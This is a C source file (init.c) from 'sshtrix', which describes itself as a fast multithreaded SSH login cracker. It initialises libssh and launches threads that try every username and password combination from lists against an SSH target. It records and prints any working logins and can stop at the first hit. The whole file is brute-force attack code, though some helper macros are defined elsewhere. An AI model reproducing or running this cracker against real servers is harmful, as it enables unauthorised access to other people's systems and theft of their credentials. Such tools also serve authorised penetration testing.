/*******************************************************************************
 * sshtrix - a very fast multithreaded SSH login cracker                       *
 *                                                                             *
 * init.c                                                                      *
 *                                                                             *
 * Copyright (C) 2011 noptrix - http://www.noptrix.net/                        *
 *                                                                             *
 * This program is free software: you can redistribute it and/or modify        *
 * it under the terms of the GNU General Public License as published by        *
 * the Free Software Foundation, either version 3 of the License, or           *
 * (at your option) any later version.                                         *
 *                                                                             *
 * This program is distributed in the hope that it will be useful,             *
 * but WITHOUT ANY WARRANTY; without even the implied warranty of              *
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the               *
 * GNU General Public License for more details.                                *
 *                                                                             *
 * You should have received a copy of the GNU General Public License           *
 * along with this program.  If not, see <http://www.gnu.org/licenses/>.       *
 *                                                                             *
 ******************************************************************************/

#include "sshtrix.h"
#include "init.h"
#include "ssh.h"

#include <time.h>
#include <libssh/libssh.h>
#include <libssh/callbacks.h>


static void *start_thread(void *);


/* run sshtrix thread start routine */
static void *start_thread(void *arg)
{
    unsigned long int u = 0, p = 0;
    time_t start;
    args_t *args = (args_t *) arg;
    list_t *list = args->job->list;     /* just for better reading */
    job_t *job = args->job;


    start = time(NULL);

    /* for each user and for each password run crack routine and save all found
     * login pairs to our list_t {} */
    for (u = 0; u < list->num_users; u++) {
        for (p = 0; p < list->num_pass; p++) {
            if (args->num == ((u * list->num_pass + p) % job->num_threads)) {
                sleep(args->job->delay);
                if (__CRACK == LOGIN_FOUND) {
                    list->found_users[list->num_found] = list->users[u];
                    list->found_pass[list->num_found] = list->pass[p];
                    list->num_found++;
                    if (job->print_login == PRINT_LOGIN_ON) {
                        printf("--- found login (user: %s pass: %s)\n",
                               list->users[u], list->pass[p]);
                    }
                    if (job->first == FIRST_FOUND_ON) {
                        return NULL;
                    }
                }
            }
            job->time = time(NULL) - start;
            if (job->verbose == VERBOSE) {
                printf("--- testing %s - %s\n", list->users[u], list->pass[p]);
            } else {
                __PRINT_STATUS_LINE
            }
        }
    }

    return NULL;
}


/* initialize sshtrix */
job_t *init(job_t *job)
{
    unsigned int i = 0;
    pthread_t tid[job->num_threads];
    args_t args[job->num_threads];


    __PRINT_ATTACK_HEADER;

    /* ok, first we need to run this (see libssh tutorial) */
    ssh_init();

    /* now we are able to start thread routine */
    for (i = 0; i < job->num_threads; i++) {
        args[i].num = i;
        args[i].job = job;
        xpthread_create(&tid[i], NULL, start_thread, &args[i]);
    }
    for (i = 0; i < job->num_threads; i++) {
        xpthread_join(tid[i], NULL);
    }

    return job;
}

/* EOF */
